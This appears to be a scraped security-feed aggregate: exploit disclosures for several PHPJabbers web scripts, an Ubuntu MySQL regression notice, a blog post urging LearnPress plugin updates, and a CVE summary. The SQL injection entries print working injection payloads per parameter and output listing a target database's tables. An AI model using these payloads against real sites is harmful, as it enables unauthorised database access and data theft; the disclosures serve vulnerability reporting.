PHPJabbers Car Park Booking System version 2.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : PHPJabbers.com                                                             ││  Vendor   : PHPJabbers                                                                 ││  Software : PHPJabbers Car Park Booking System 2.0 - Reflected XSS                     ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpGET parameter 'index' is vulnerable to XSS/index.php?controller=pjFront&action=pjActionSearch&session_id=c6e6onmv599a10vr76oei88jh2&theme=1&locale=1&hide=0&index=[XSS][-] Done

PHPJabbers Car Park Booking System 2.0 Cross Site Scripting

Ubuntu Security Notice 5823-3 - USN-5823-1 fixed vulnerabilities in MySQL. Unfortunately, 8.0.32 introduced a regression in MySQL Router preventing connections from PyMySQL. This update reverts most of the changes in MySQL Router to 8.0.31 until a proper fix can be found.

==========================================================================  
Ubuntu Security Notice USN-5823-3  
January 29, 2023

mysql-5.7, mysql-8.0 regression  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

USN 5823-1 introduced a regression in MySQL.

Software Description:  
- mysql-8.0: MySQL database

Details:

USN-5823-1 fixed vulnerabilities in MySQL. Unfortunately, 8.0.32 introduced  
a regression in MySQL Router preventing connections from PyMySQL. This  
update reverts most of the changes in MySQL Router to 8.0.31 until a proper  
fix can be found.

We apologize for the inconvenience.

Original advisory details:

  Multiple security issues were discovered in MySQL and this update includes  
  new upstream MySQL versions to fix these issues.  
   MySQL has been updated to 8.0.32 in Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and  
  Ubuntu 22.10. Ubuntu 18.04 LTS has been updated to MySQL 5.7.41.  
   In addition to security fixes, the updated packages contain bug fixes, new  
  features, and possibly incompatible changes.  
   Please see the following for more information:  
   https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-41.html  
  https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-32.html  
  https://www.oracle.com/security-alerts/cpujan2023.html

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   mysql-server-8.0                8.0.32-0ubuntu0.22.10.2

Ubuntu 22.04 LTS:  
   mysql-server-8.0                8.0.32-0ubuntu0.22.04.2

Ubuntu 20.04 LTS:  
   mysql-server-8.0                8.0.32-0ubuntu0.20.04.2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5823-3  
   https://ubuntu.com/security/notices/USN-5823-1  
   https://launchpad.net/bugs/2003835

Package Information:  
   https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.32-0ubuntu0.22.10.2  
   https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.32-0ubuntu0.22.04.2  
   https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.32-0ubuntu0.20.04.2

Ubuntu Security Notice USN-5823-3

PHPJabbers Event Ticketing System Script version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : PHPJabbers.com                                                             ││  Vendor   : PHPJabbers                                                                 ││  Software : PHPJabbers Event Ticketing System Script 1.0                               ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.php/preview.php?lid=[XSS]GET parameter 'lid' is vulnerable to XSS[-] Done

PHPJabbers Event Ticketing System Script 1.0 Cross Site Scripting

PHPJabbers Travel Tours Script version 1.0 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : PHPJabbers.com                                                             ││  Vendor   : PHPJabbers                                                                 ││  Software : PHPJabbers Travel Tours Script 1.0                                         ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /front.phpfront.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=[SQLI]&rating_to=[SQLI]GET parameter 'rating_from' is vulnerable to SQLI---Parameter: rating_from (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2) AND 3442=3442 AND (7236=7236&rating_to=5    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2) AND GTID_SUBSET(CONCAT(0x71626b7a71,(SELECT (ELT(9974=9974,1))),0x71626b7871),9974) AND (8540=8540&rating_to=5    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2) AND (SELECT 2396 FROM (SELECT(SLEEP(5)))lmil) AND (1063=1063&rating_to=5---GET parameter 'rating_to' is vulnerable to SQLI---Parameter: rating_to (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2&rating_to=5) AND 3784=3784 AND (4445=4445    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2&rating_to=5) AND GTID_SUBSET(CONCAT(0x71626b7a71,(SELECT (ELT(9427=9427,1))),0x71626b7871),9427) AND (7794=7794    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2&rating_to=5) AND (SELECT 9220 FROM (SELECT(SLEEP(5)))QqcU) AND (6313=6313---[+] Starting the Attackfetching tables for database: '********_****_***'Database: ********_****_***[52 tables]+------------------------------------------+| vacationpackages_comments                || vacationpackages_countries               || vacationpackages_enquiries               || vacationpackages_features                || vacationpackages_fields                  || vacationpackages_listings_availabilities || vacationpackages_listings_features       || vacationpackages_listings                || vacationpackages_multi_lang              || vacationpackages_notifications           || vacationpackages_options                 || vacationpackages_payments                || vacationpackages_periods                 || vacationpackages_plugin_country          || vacationpackages_plugin_galleries_set    || vacationpackages_plugin_gallery          || vacationpackages_plugin_locale_languages || vacationpackages_plugin_locale           || vacationpackages_plugin_log_config       || vacationpackages_plugin_log              || vacationpackages_plugin_one_admin        || vacationpackages_plugin_paypal           || vacationpackages_prices                  || vacationpackages_roles                   || vacationpackages_types                   || vacationpackages_users                   || vacationpackages_comments                || vacationpackages_countries               || vacationpackages_enquiries               || vacationpackages_features                || vacationpackages_fields                  || vacationpackages_listings                || vacationpackages_listings_availabilities || vacationpackages_listings_features       || vacationpackages_multi_lang              || vacationpackages_notifications           || vacationpackages_options                 || vacationpackages_payments                || vacationpackages_periods                 || vacationpackages_plugin_country          || vacationpackages_plugin_galleries_set    || vacationpackages_plugin_gallery          || vacationpackages_plugin_locale           || vacationpackages_plugin_locale_languages || vacationpackages_plugin_log              || vacationpackages_plugin_log_config       || vacationpackages_plugin_one_admin        || vacationpackages_plugin_paypal           || vacationpackages_prices                  || vacationpackages_roles                   || vacationpackages_types                   || vacationpackages_users                   |+------------------------------------------+[-] Done

PHPJabbers Travel Tours Script 1.0 SQL Injection

PHPJabbers Travel Tours Script version 1.0 suffers from a cross site scripting vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                  [ Vulnerability ]                                   ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : PHPJabbers.com                                                             │  
│  Vendor   : PHPJabbers                                                                 │  
│  Software : PHPJabbers Travel Tours Script 1.0                                         │  
│  Vuln Type: Reflected XSS                                                              │  
│  Impact   : Manipulate the content of the site                                         │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                                                                                       ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│  Release Notes:                                                                        │  
│  ═════════════                                                                         │  
│  The attacker can send to victim a link containing a malicious URL in an email or      │  
│  instant message can perform a wide variety of actions, such as stealing the victim's  │  
│  session token or login credentials                                                    │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   

         CryptoJob (Twitter) twitter.com/CryptozJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2023                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /front.php

/front.php?controller=pjListings&action=pjActionListings&listing_search=[XSS]&view=[XSS]&season=[XSS]&price_from=[XSS]&price_to=[XSS]&rating_from=[XSS]&rating_to=[XSS]

/front.php?controller=pjListings&action=pjActionRegister&view=[XSS]&direction=[XSS]&listing_search=[XSS]

/front.php?controller=pjListings&action=pjActionListings&listing_search=[XSS]&view=[XSS]&season=[XSS]&pjPage=[XSS]

GET parameter 'listing_search' is vulnerable to XSS

GET parameter 'view' is vulnerable to XSS

GET parameter 'season' is vulnerable to XSS

GET parameter 'direction' is vulnerable to XSS

GET parameter 'price_from' is vulnerable to XSS

GET parameter 'price_to' is vulnerable to XSS

GET parameter 'pjPage' is vulnerable to XSS

GET parameter 'rating_from' is vulnerable to XSS

GET parameter 'rating_to' is vulnerable to XSS

URL parameter to XSS

/front.php/[XSS]?controller=pjListings&action=pjActionRegister&view=[XSS]t&direction=[XSS]&listing_search=[XSS]

[-] Done

PHPJabbers Travel Tours Script 1.0 Cross Site Scripting

PHPJabbers Property Listing Script version 3.1 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : PHPJabbers.com                                                             ││  Vendor   : PHPJabbers                                                                 ││  Software : PHPJabbers Property Listing Script 3.1                                     ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: preview.php/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=[SQLI]&min_bedrooms=[SQLI]&max_bedrooms=[SQLI]&min_bathrooms=[SQLI]&max_bathrooms=[SQLI]&min_floor_area=11&max_floor_area=33GET parameter 'feature_id' is vulnerable to SQLI---Parameter: feature_id (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1' RLIKE (SELECT (CASE WHEN (2062=2062) THEN 1 ELSE 0x28 END)) AND 'NbjG'='NbjG&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1' AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(2733=2733,1))),0x716b707171),2733) AND 'iWla'='iWla&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1' AND (SELECT 3509 FROM (SELECT(SLEEP(5)))pnEw) AND 'UOAT'='UOAT&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33---GET parameter 'min_bedrooms' is vulnerable to SQLI---Parameter: min_bedrooms (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) RLIKE (SELECT (CASE WHEN (7879=7879) THEN 1 ELSE 0x28 END))-- HIzI&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(2095=2095,1))),0x716b707171),2095)-- bfcY&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) AND (SELECT 9649 FROM (SELECT(SLEEP(5)))cOvl)-- zdSI&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33---GET parameter 'max_bedrooms' is vulnerable to SQLI---Parameter: max_bedrooms (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) RLIKE (SELECT (CASE WHEN (6630=6630) THEN 2 ELSE 0x28 END))-- gEsM&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(9738=9738,1))),0x716b707171),9738)-- jXwM&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) AND (SELECT 3446 FROM (SELECT(SLEEP(5)))VCFX)-- cQSs&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33---GET parameter 'min_bathrooms' is vulnerable to SQLI---Parameter: min_bathrooms (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) RLIKE (SELECT (CASE WHEN (2227=2227) THEN 2 ELSE 0x28 END))-- lmwd&max_bathrooms=3&min_floor_area=11&max_floor_area=33    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(4352=4352,1))),0x716b707171),4352)-- OidJ&max_bathrooms=3&min_floor_area=11&max_floor_area=33    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) AND (SELECT 6082 FROM (SELECT(SLEEP(5)))PGLl)-- mBCY&max_bathrooms=3&min_floor_area=11&max_floor_area=33---GET parameter 'max_bathrooms' is vulnerable to SQLI---Parameter: max_bathrooms (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) RLIKE (SELECT (CASE WHEN (9932=9932) THEN 3 ELSE 0x28 END))-- GPVf&min_floor_area=11&max_floor_area=33    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(3098=3098,1))),0x716b707171),3098)-- hFHq&min_floor_area=11&max_floor_area=33    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) AND (SELECT 4637 FROM (SELECT(SLEEP(5)))iqxa)-- IvPE&min_floor_area=11&max_floor_area=33---[+] Starting the Attackfetching tables for database: '********_****_***'Database: ********_****_***[66 tables]+------------------------------------------+| property_listing_features                || property_listing_fields                  || property_listing_multi_lang              || property_listing_options                 || property_listing_passwords               || property_listing_payments                || property_listing_periods                 || property_listing_plugin_country          || property_listing_plugin_galleries_set    || property_listing_plugin_gallery          || property_listing_plugin_locale_languages || property_listing_plugin_locale           || property_listing_plugin_log_config       || property_listing_plugin_log              || property_listing_plugin_one_admin        || property_listing_plugin_paypal           || property_listing_plugin_sms              || property_listing_properties_features     || property_listing_properties              || property_listing_roles                   || property_listing_types                   || property_listing_users                   || property_listing_features                || property_listing_fields                  || property_listing_multi_lang              || property_listing_options                 || property_listing_passwords               || property_listing_payments                || property_listing_periods                 || property_listing_plugin_country          || property_listing_plugin_galleries_set    || property_listing_plugin_gallery          || property_listing_plugin_locale_languages || property_listing_plugin_locale           || property_listing_plugin_log_config       || property_listing_plugin_log              || property_listing_plugin_one_admin        || property_listing_plugin_paypal           || property_listing_plugin_sms              || property_listing_properties_features     || property_listing_properties              || property_listing_roles                   || property_listing_types                   || property_listing_users                   || property_listing_features                || property_listing_fields                  || property_listing_multi_lang              || property_listing_options                 || property_listing_passwords               || property_listing_payments                || property_listing_periods                 || property_listing_plugin_country          || property_listing_plugin_galleries_set    || property_listing_plugin_gallery          || property_listing_plugin_locale           || property_listing_plugin_locale_languages || property_listing_plugin_log              || property_listing_plugin_log_config       || property_listing_plugin_one_admin        || property_listing_plugin_paypal           || property_listing_plugin_sms              || property_listing_properties              || property_listing_properties_features     || property_listing_roles                   || property_listing_types                   || property_listing_users                   |+------------------------------------------+[-] Done

PHPJabbers Property Listing Script 3.1 SQL Injection

PHPJabbers Property Listing Script version 3.1 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : PHPJabbers.com                                                             ││  Vendor   : PHPJabbers                                                                 ││  Software : PHPJabbers Property Listing Script 3.1                                     ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpMethod: GET/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&for=[XSS]&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=[XSS]&max_bedrooms=[XSS]&min_bathrooms=[XSS]&max_bathrooms=[XSS]&min_floor_area=11&max_floor_area=33URL parameter 'for' is vulnerable to XSSURL parameter 'min_bedrooms' is vulnerable to XSSURL parameter 'max_bedrooms' is vulnerable to XSSURL parameter 'min_bathrooms' is vulnerable to XSSURL parameter 'max_bathrooms' is vulnerable to XSS[-] Done

It’s time for a reminder to ensure all of your WordPress plugins are fully up to date (or removed, if you don't need them). Bleeping Computer reports that as many as 75,000 WordPress sites may be open to several flaws in a plugin called LearnPress. Worse, the update tally for users of the plugin isn't doing particularly well, with a big slice of site owners still to update.

If you own or operate a website there is a very good chance it uses WordPress. More than 40 precent of websites use a version of it, and it's used on more websites that all other website Content Management Systems (CMS) combined. One of the reasons it's so popular is that it can be easily extended by adding plugins, of which there are tens of thousands.

Provided it is kept up to date and protected by two-factor authentication, WordPress itself is quite secure. Because of that, in recent years threat actors have focussed on exploiting it via vulnerabilities in plugins rather than attacking it directly.

LearnPress is a WordPress plugin used for creating and selling courses online, with extra paid options available for additional features. This is something which would no doubt have been popular over the pandemic, and indeed up to the present day, as companies continue to lean heavily on online and remote services only.

A ripe target, then, for exploitation and targeted attacks.

Somewhere in the region of 100,000 sites make use of the LearnPress plugin, all of which will need to upgrade to LearnPress 4.2.0 if they haven't already.

The vulnerabilities are:

*   CVE-2022-47615, an unauthenticated Local File Inclusion vulnerability that allows remote viewing of local files on a web server, which could lead to API keys, credentials, and other secrets being exposed.
*   CVE-2022-45808 and CVE-2022-45820, a pair of SQL injection vulnerabilities that could result in data modification, code execution, and more.

Patchstack discovered the three issues between the November 30, 2022 and December 4, 2022, with initial outreach on the same day as the first discovery, and subsequent details passed on over the following days. The issues were patched on December 20.

This is a fairly speedy turnaround compared to some of the other timeline notifications we’ve seen for plugins. Indeed, it’s not uncommon to not hear back from a developer at all and discover the plugin has been abandoned. (If you ever find yourself dealing with an abandoned plugin, you’ll need to untangle your site from it, which can cause additional complications and headaches for the site admin.)

Just to reiterate, upgrading your LearnPress install to version 4.2.0 is the way to lock these particular vulnerabilities down. With this done, you shouldn’t have any more concerns.

As for your plugins generally, this may be the perfect time to have a quick spring clean of your site and see which plugins you need and which ones you don’t:

*   **Update existing plugins**. If you use WordPress you can check if you have any plugins that need updating by logging in to your site and going to **Dashboard** > **Updates.** (The **Themes** and **Plugins** menu items will also have red circles next to them if any need updating.) Update everything.
*   **Turn on automatic updates for plugins**. By default, WordPress does not update plugins automatically. You can enable this on a per-plugin basis by going to the **Plugins** screen and clicking **Enable auto-updates** next to each plugin.
*   **Remove unsupported plugins**. Go to the **Plugins** screen and click **View details** for each plugin. This screen shows you the last version of WordPress the plugin was tested with, and when it was last updated. It will also display an alert if it thinks the plugin is no longer supported.
*   Remove unnecessary plugins. Check out how many plugins and themes you have installed on your site. Do you need them all? Can any of them be removed or replaced? Generally, fewer is better.

If you can’t make enough time available to keep on top of theme and plugins, don't let not doing it become an option: Pay somebody to do it for you.

Stay safe out there!

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Update your LearnPress plugins now!

SQL injection vulnerability in the CONPROSYS HMI System (CHS) Ver.3.5.0 and earlier allows a remote authenticated attacker to execute an arbitrary SQL command. As a result, information stored in the database may be obtained.

